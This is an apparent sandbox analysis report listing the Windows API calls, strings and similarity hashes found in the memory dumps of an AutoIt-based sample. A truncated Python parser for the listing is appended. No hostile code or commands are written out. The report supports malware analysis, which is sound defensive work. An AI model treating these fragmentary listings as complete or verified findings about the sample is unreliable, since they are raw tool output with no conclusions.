                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      • Opcode ID: 1e054631ab96b5c0eda77d5b4badd8c0f4a0904443cdacccd5f6ddca9b532d00
                                                                      • Instruction ID: e58708349fd3e7b4057e40bd8e79446cfe100a55909d230c709ba62b27e4950f
                                                                      • Opcode Fuzzy Hash: 1e054631ab96b5c0eda77d5b4badd8c0f4a0904443cdacccd5f6ddca9b532d00
                                                                      • Instruction Fuzzy Hash: 46119D723006087FEF219F94DC80EFF3B6AFBA83A5F104229F919A7290D6759D558760
                                                                      APIs
                                                                        • Part of subcall function 009C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009C604C
                                                                        • Part of subcall function 009C600E: GetStockObject.GDI32(00000011), ref: 009C6060
                                                                        • Part of subcall function 009C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 009C606A
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A5377A
                                                                      • GetSysColor.USER32(00000012), ref: 00A53794
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 1983116058-2160076837
                                                                      • Opcode ID: 128df34688ca146bd967afe703820b8e549f1f75ea2a936b70668a168fb790da
                                                                      • Instruction ID: 49d5ccef6947c9352fe2f7f14505064c62c8bf5808a089a28bc38190803cdba2
                                                                      • Opcode Fuzzy Hash: 128df34688ca146bd967afe703820b8e549f1f75ea2a936b70668a168fb790da
                                                                      • Instruction Fuzzy Hash: 951126B2A1020AAFDF00DFA8CC46EEA7BB8FB48355F004915FD56E2250E735E955DB60
                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A3CD7D
                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A3CDA6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      • Opcode ID: 27e6e21814333f8754a21e4ae27cc93441bbefa5d28c3163b9ca191748c5c120
                                                                      • Instruction ID: cd85e3331dc0a5f86715f5985081d9e04a49c26a83cfab249a25daa632b81675
                                                                      • Opcode Fuzzy Hash: 27e6e21814333f8754a21e4ae27cc93441bbefa5d28c3163b9ca191748c5c120
                                                                      • Instruction Fuzzy Hash: D311C2B5205631BED7384B668C49EE7BEACEF127F4F00422AB109A3080D7749941D7F0
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00A534AB
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A534BA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      • Opcode ID: 57f83cf12ff57cc984d31da7167704bd75913ca7e27bbb3e6db2375e7050e6f3
                                                                      • Instruction ID: c9b90657e301b163d6147612fc2112e3a7c8cfd2247eeef15d798b15db31a213
                                                                      • Opcode Fuzzy Hash: 57f83cf12ff57cc984d31da7167704bd75913ca7e27bbb3e6db2375e7050e6f3
                                                                      • Instruction Fuzzy Hash: EE118B72100208AFEF118FA49C40AAA376AFB843B6F504724FD61931D4C735DC9A9750
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00A26CB6
                                                                      • _wcslen.LIBCMT ref: 00A26CC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: STOP
                                                                      • API String ID: 1256254125-2411985666
                                                                      • Opcode ID: a11be7230e3af0686cd3ebad85048125584d36036021b08cc9571b0f05ab33be
                                                                      • Instruction ID: d70c76a0aae0d6ca94551687efa28009d1f47a07c7d9d89f4629b2d6cb3d3c1b
                                                                      • Opcode Fuzzy Hash: a11be7230e3af0686cd3ebad85048125584d36036021b08cc9571b0f05ab33be
                                                                      • Instruction Fuzzy Hash: 1501D232A0193A8BCB21AFFDEC80ABF77B5FBA57147500539E86297195EB31D900C650
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 00A23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A23CCA
                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A21D4C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 20eacb678fc82b65d0397a48854c09cdfddc6b78fb5669a7a6b59cc4268f8872
                                                                      • Instruction ID: 7ba8cc3cf23519f96ba421eaaa84ddc2ce6812869970d37e1af3c25e26276e03
                                                                      • Opcode Fuzzy Hash: 20eacb678fc82b65d0397a48854c09cdfddc6b78fb5669a7a6b59cc4268f8872
                                                                      • Instruction Fuzzy Hash: BF012871A00224ABCF08EFA8ED15EFE73A8FB62350B400929F872572C1EA3459088761
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 00A23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A23CCA
                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A21C46
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: de8e890a52b8cd2728ad694be6464840c80e453732e2d812a30faf444b49b622
                                                                      • Instruction ID: 1d06d3ded91c26974c075481abd95cc6c905dbbe97bbacd51629852fcc431166
                                                                      • Opcode Fuzzy Hash: de8e890a52b8cd2728ad694be6464840c80e453732e2d812a30faf444b49b622
                                                                      • Instruction Fuzzy Hash: 71018475A811187BCB08EBA4DA55FFF77A89B62340F140029A816772C1EA249E1886B2
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 00A23CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00A23CCA
                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A21CC8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 262b4a8ac51e2abb72cecefd0cfafc92aa9f80dca8c1a88b2bb123d8c9093104
                                                                      • Instruction ID: 92747c737c8893acd6f09a140d8b01a326b9e119c485a61e4961a1c44d586880
                                                                      • Opcode Fuzzy Hash: 262b4a8ac51e2abb72cecefd0cfafc92aa9f80dca8c1a88b2bb123d8c9093104
                                                                      • Instruction Fuzzy Hash: 8B01DB75E8012467CF04FBA8DB15FFE77A8AB21340F140439B80673281EA249F18C672
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: 3, 3, 16, 1
                                                                      • API String ID: 176396367-3042988571
                                                                      • Opcode ID: 7714bbd2e46d7a0f6c98c8d350a262fd84d77e299e8f94b10067f4d0e8ce3ae7
                                                                      • Instruction ID: 4d7e9763ef290122826587824e7a51617618e2bd12e80f50a0095166ecd7399b
                                                                      • Opcode Fuzzy Hash: 7714bbd2e46d7a0f6c98c8d350a262fd84d77e299e8f94b10067f4d0e8ce3ae7
                                                                      • Instruction Fuzzy Hash: BDE02B0A2042A0209232237A9CC1A7F5789DFC9B91710182BF981D6267EB94CD9193F1
                                                                      APIs
                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A20B23
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: AutoIt$Error allocating memory.
                                                                      • API String ID: 2030045667-4017498283
                                                                      • Opcode ID: df9a750eb4d4b273dd2817364c0389220e895c87022976f74b63c55d24d4c4d5
                                                                      • Instruction ID: 50c0d40225461533142dfa413d258859245f923c31fe07d594a0223415a95436
                                                                      • Opcode Fuzzy Hash: df9a750eb4d4b273dd2817364c0389220e895c87022976f74b63c55d24d4c4d5
                                                                      • Instruction Fuzzy Hash: A0E0D8312843183ED21037957C03F897F84EF09F61F10482BFB88955C38AE1685046A9
                                                                      APIs
                                                                        • Part of subcall function 009DF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009E0D71,?,?,?,009C100A), ref: 009DF7CE
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,009C100A), ref: 009E0D75
                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,009C100A), ref: 009E0D84
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009E0D7F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 55579361-631824599
                                                                      • Opcode ID: 5b75aafe0e6aa728bc31748685febcb981067f1da01e762ba1becb88212d0939
                                                                      • Instruction ID: da159851db3c8b367d956c45d1b3a104a67ab89e9b91c9277624ab30d23e6cff
                                                                      • Opcode Fuzzy Hash: 5b75aafe0e6aa728bc31748685febcb981067f1da01e762ba1becb88212d0939
                                                                      • Instruction Fuzzy Hash: FEE06D702003418FD371EFB9E80578A7BE4BB40745F00892DE882C7695DBF0E889CBA1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LocalTime
                                                                      • String ID: %.3d$X64
                                                                      • API String ID: 481472006-1077770165
                                                                      • Opcode ID: 6d7addf51120e9b79eb79124a2af4703b31f33bb097497a187d48aa0a2fc4c34
                                                                      • Instruction ID: d5b19dab9205145a19cf498dd37776c0f830b82df140e1c0b224945ffe48b304
                                                                      • Opcode Fuzzy Hash: 6d7addf51120e9b79eb79124a2af4703b31f33bb097497a187d48aa0a2fc4c34
                                                                      • Instruction Fuzzy Hash: DFD012B1849218F9CF50A6D0DC459FDB37CFB59301F608453F816A1040D638D5886761
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A5232C
                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A5233F
                                                                        • Part of subcall function 00A2E97B: Sleep.KERNEL32 ref: 00A2E9F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: 2ffa984c5d750d6af02ebd1e0951de130f21050ae729f9af6e7b6099805c7186
                                                                      • Instruction ID: 2d63dc13b102921bb690f79d62a7dca35cf135305862f91f940075ea895b0193
                                                                      • Opcode Fuzzy Hash: 2ffa984c5d750d6af02ebd1e0951de130f21050ae729f9af6e7b6099805c7186
                                                                      • Instruction Fuzzy Hash: 40D012763D4310BBE664F7B0ED1FFC6BA14BB00B21F0049167745AA1D4D9F4A842CB54
                                                                      APIs
                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A5236C
                                                                      • PostMessageW.USER32(00000000), ref: 00A52373
                                                                        • Part of subcall function 00A2E97B: Sleep.KERNEL32 ref: 00A2E9F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FindMessagePostSleepWindow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 529655941-2988720461
                                                                      • Opcode ID: c2fa820f661dc520790992be051a232a75c2a2d56232fdc7f44a5379de92883a
                                                                      • Instruction ID: f06c07b333be2a754f73efbf7f6783ff241464a44f5906d838307a4f12b73e85
                                                                      • Opcode Fuzzy Hash: c2fa820f661dc520790992be051a232a75c2a2d56232fdc7f44a5379de92883a
                                                                      • Instruction Fuzzy Hash: 9ED0C9723C13107AE664F7B0AD1FFC6A614AB04B21F4049167645AA1D4D9A4A8428A54
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 009FBE93
                                                                      • GetLastError.KERNEL32 ref: 009FBEA1
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009FBEFC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1717984340-0
                                                                      • Opcode ID: 3fe1b8ecdbac3aebe82e4fc5886336700ebf6bdbc0045c541e8c6caa7c5eb694
                                                                      • Instruction ID: d043f7311d4307ac971acbefa3b67ca1b94aa00f919fe0b7a439219412d267b1
                                                                      • Opcode Fuzzy Hash: 3fe1b8ecdbac3aebe82e4fc5886336700ebf6bdbc0045c541e8c6caa7c5eb694
                                                                      • Instruction Fuzzy Hash: 8241083460020EAFCF21AFA5CC54BBABBA9EF41720F144169FB599B2A1DB308D01CB50
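Added example (not part of the Joe Sandbox report or of its tooling): a small Python parser for the per-function blocks listed above. It reads the APIs, Memory Dump Source, Joe Sandbox IDA Plugin and Similarity fields into records, groups functions that share an API String ID (the two Shell_TrayWnd variants above do, despite having different Opcode IDs), and compares Instruction Fuzzy Hashes by nibble-wise Hamming distance. The sample input is constructed from the three blocks in this section, with the Associated, Instruction ID and Opcode Fuzzy Hash lines omitted; the Hamming comparison is my own assumption, since the report does not document how its fuzzy hash is built, so it is only a crude closeness indicator and not Joe Sandbox's own similarity score.

```python
"""Parse the per-function blocks of a Joe Sandbox IDA-plugin listing (APIs /
Strings / Memory Dump Source / Joe Sandbox IDA Plugin / Similarity) into
records that can be grouped by API String ID and compared offline."""
import re
from collections import defaultdict

# Constructed sample: the three blocks in this section of the report, same line
# layout as the page. The first block is truncated as on the page (only its
# Similarity fields fall inside the section), so it has no API entries.
SAMPLE = """\
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 2ffa984c5d750d6af02ebd1e0951de130f21050ae729f9af6e7b6099805c7186
• Instruction Fuzzy Hash: 40D012763D4310BBE664F7B0ED1FFC6BA14BB00B21F0049167745AA1D4D9F4A842CB54
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A5236C
• PostMessageW.USER32(00000000), ref: 00A52373
  • Part of subcall function 00A2E97B: Sleep.KERNEL32 ref: 00A2E9F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: c2fa820f661dc520790992be051a232a75c2a2d56232fdc7f44a5379de92883a
• Instruction Fuzzy Hash: 9ED0C9723C13107AE664F7B0AD1FFC6A614AB04B21F4049167645AA1D4D9A4A8428A54
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 009FBE93
• GetLastError.KERNEL32 ref: 009FBEA1
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009FBEFC
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: 3fe1b8ecdbac3aebe82e4fc5886336700ebf6bdbc0045c541e8c6caa7c5eb694
• Instruction Fuzzy Hash: 8241083460020EAFCF21AFA5CC54BBABBA9EF41720F144169FB599B2A1DB308D01CB50
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source",
            "Joe Sandbox IDA Plugin", "Similarity"}
# "• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A5236C" or
# "• Part of subcall function 00A2E97B: Sleep.KERNEL32 ref: 00A2E9F3"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# "• Key Name: value"; the value may be empty, as in "• String ID:"
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")


def _new_block():
    return {"apis": [], "similarity": {}, "source": None, "snapshot": None}


def parse_blocks(text):
    """Split the listing into per-function records. A block is closed by its
    Instruction Fuzzy Hash line, the last field the report prints for it."""
    blocks, cur, section = [], _new_block(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:          # bare heading line switches the section
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                cur["apis"].append({"api": m["api"], "module": m["mod"],
                                    "args": m["args"], "ref": m["ref"].upper(),
                                    "subcall": m["sub"]})
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if section == "Similarity":
            cur["similarity"][key] = val
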